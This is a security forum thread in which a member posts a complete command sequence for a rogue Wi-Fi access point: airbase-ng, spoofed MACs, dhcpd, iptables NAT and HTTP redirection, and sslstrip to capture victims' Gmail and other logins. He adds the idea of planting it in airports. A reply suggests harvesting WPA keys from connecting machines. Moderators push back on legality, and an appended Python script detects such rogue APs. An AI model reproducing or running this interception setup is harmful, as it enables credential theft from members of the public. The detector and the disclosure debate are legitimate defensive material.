
Thread: Setting up airbase with sslstrip

  1. #1 imported_vvpalin (Member, joined Apr 2009, 442 posts)

    Setting up airbase with sslstrip

    I've read so much on airbase and sslstrip it's not even funny, yet not once have I seen anyone combine the 2. That seemed rather odd to me as it was the first thing I thought about when I found out about sslstrip. "I'm a total n00b"

    I did this a few weeks ago and it does work, but I must say that even without sslstrip running, the Alfa card is crap for this as you can't select the MTU and connecting to the net is agonizingly slow. After a little digging I found out that it's because the packet size is enlarged when passed through the tap, and causes it to be fragmented because it's too large.

    Anyways this is how you do it.

    Start airbase

    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airbase-ng -e APCONNECT wlan0

    Start and connect to your AP with the second adapter "I set mine to open auth"

    macchanger --mac 00:55:44:33:22:11 wlan1
    iwconfig wlan1 ap 00:22:22:22:22:22 essid myapname channel 5
    dhclient wlan1

    Bring up the tap and set the IP

    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500

    Put this in your dhcpd.conf file

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    range 10.0.0.20 10.0.0.50;
    }

    Start dhcp and set the routing table

    dhcpd3 -cf /root/dhcpd.conf at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables -t nat -A POSTROUTING --out-interface wlan1 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

    Now just start up sslstrip on the tap

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    echo "1" > /proc/sys/net/ipv4/ip_forward
    python ./sslstrip.py -p -f -l 8080

    All you need to do is connect your client to your AP and browse Gmail or whatever.

    If sslstrip ever gets ported to C or some other decent language, I think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

    It's honestly scary how effective that attack would be given the right area and a skilled attacker. All an attacker would need to do is get the cert explained in Moxie's video, add an antenna to one or both of the FONs and put it in an airport or business park with a crafty name.

    Not too shabby for this noob

    Edit: I just found out btw that you can run Python on the FON with the addition of a media card hack.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
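    As a defender-side counterpart to the setup in the post above, here is an added example (not code from the thread) of the check a wireless IDS or a scripted scan parser makes against it: a managed ESSID appearing from a BSSID you do not own, or advertised with open auth where it should be WPA2. The record format, the inventory in KNOWN_APS and the sample scan lines are all constructed for the example.

```python
from collections import namedtuple

Beacon = namedtuple("Beacon", "bssid essid channel privacy")

# Assumed inventory of the BSSIDs you actually operate, per ESSID,
# and the security each one is expected to advertise.
KNOWN_APS = {"myapname": {"00:22:22:22:22:22"}}
EXPECTED_PRIVACY = {"myapname": "WPA2"}

def parse_scan(lines):
    """Parse 'bssid,essid,channel,privacy' records (constructed format)."""
    beacons = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, essid, channel, privacy = (f.strip() for f in line.split(","))
        beacons.append(Beacon(bssid.lower(), essid, int(channel), privacy.upper()))
    return beacons

def find_rogues(beacons):
    """Return (bssid, essid, reason) for every beacon that should raise an alert."""
    alerts = []
    for b in beacons:
        if b.essid not in KNOWN_APS:
            continue  # not a network we manage; a foreign SSID is not by itself a rogue
        if b.bssid not in KNOWN_APS[b.essid]:
            alerts.append((b.bssid, b.essid, "unknown BSSID for managed ESSID"))
        if b.privacy == "OPN" and EXPECTED_PRIVACY[b.essid] != "OPN":
            alerts.append((b.bssid, b.essid, "security downgrade to open auth"))
    return alerts

# Constructed sample: the real AP, a clone of it using the spoofed MAC from
# the post with open auth, and an unrelated open network (ignored).
SAMPLE_SCAN = """
# bssid,essid,channel,privacy
00:22:22:22:22:22,myapname,5,WPA2
00:11:22:33:44:55,myapname,6,OPN
00:11:22:33:44:55,APCONNECT,6,OPN
"""

if __name__ == "__main__":
    for bssid, essid, reason in find_rogues(parse_scan(SAMPLE_SCAN.splitlines())):
        print(f"ALERT {essid} via {bssid}: {reason}")
```

    Feed it the ESSID/BSSID/privacy columns of a real scan (airodump-ng's CSV output carries all three) to get the same alerts for live traffic.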

  2. #2 KMDave (Moderator, joined Jan 2010, 2,281 posts)

    Quote Originally Posted by vvpalin

    If sslstrip ever gets ported to C or some other decent language, I think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

    It's honestly scary how effective that attack would be given the right area and a skilled attacker. Just make sure you do the cert explained in Moxie's video, add an antenna to one or both of the FONs and put it in an airport or business park with a crafty name.

    Not too shabby for this noob

    Even though I appreciate you creating a tutorial, the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules.

    That last part is quite shabby and very noobish.
    Tiocfaidh ár lá

  3. #3 imported_onryo (Member, joined Apr 2009, 109 posts)

    Good stuff vvpalin!
    Have you been able to get airbase-ng to work in "-P" mode, i.e. airbase-ng -P -C 30? A really devastating blow would be to see this working with harvester.rb and wkv.exe. This will extract the network key off all machines that connect. The idea being that you don't have to crack a WPA key. It will just be grabbed from every computer that connects to airbase. Do this with airbase in -P mode... wow! Just make sure it is only your machines that connect. Otherwise this could redefine the concept of "wardriving" to an illegal activity. I have started porting SSLstrip to C. I am not the best coder on earth so it can take a while.

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  4. #4 imported_vvpalin (Member, joined Apr 2009, 442 posts)

    Quote Originally Posted by KMDave
    Even though I appreciate you creating a tutorial, the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules.

    That last part is quite shabby and very noobish.

    I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.

    For the last month or so I have taken on the mindset of an attacker; it has been great fun. While doing this I came up with that idea and I thought I would share, as I really have no one else to tell, and if not here it would stay locked in my head forever.

    If you would like me to delete it I will, but it is a serious threat and I think people should be aware of it.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  5. #5 KMDave (Moderator, joined Jan 2010, 2,281 posts)

    Sorry maybe I just got it wrong when I read it early that morning.

    Nobody is perfect, I am making mistakes too and I apologize for it.

    Wasn't meant as an insult at all, but a well meant hint anyway.

    Thanks for pointing it out again.
    Tiocfaidh ár lá

  6. #6 Archangel-Amael (Super Moderator, location: Somewhere, joined Jan 2010, 8,012 posts)

    Quote Originally Posted by vvpalin
    I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.
    For the last month or so I have taken on the mindset of an attacker; it has been great fun. While doing this I came up with that idea and I thought I would share, as I really have no one else to tell, and if not here it would stay locked in my head forever.
    If you would like me to delete it I will, but it is a serious threat and I think people should be aware of it.

    It should be obvious to you (and I know it is) that if someone here thinks you are doing or attempting to do something illegal and/or unethical, you will get called on it.
    'nuff said. On the other hand, full disclosure, as was just mentioned in another thread, is important. If it helps make a product or application more secure then I (and others) are all for it, but there is a caveat with that. It must be done appropriately.
    Example: finding a zero day and then posting it here before contacting the manufacturer. That would be a big no-no. It's alright that you post your ideas (I don't think anyone is against that). If there is something that you may think is questionable, an easy thing to do would be to PM the idea/s to someone with more experience or a mod. This can help you to ensure that you are on the "up & up".
    As for the deletion part it is kind of late to do so, but if a mod sees it and thinks that it is not appropriate then I am sure they will take care of it.
    Cheers
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7 imported_vvpalin (Member, joined Apr 2009, 442 posts)

    It's reworded a little bit as I think the last few lines were the major problem.

    I'm all for full disclosure, however that's not even in my ballpark yet being how new I am. My ideas are mostly just based on the little things I know and for whatever reason people not connecting the dots.

    That's why I'm so eager to learn, because I honestly think given enough "training" I can become a serious asset to the security community.

    lol anyone want to offer me a job .. I'll even work for minimum wage
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
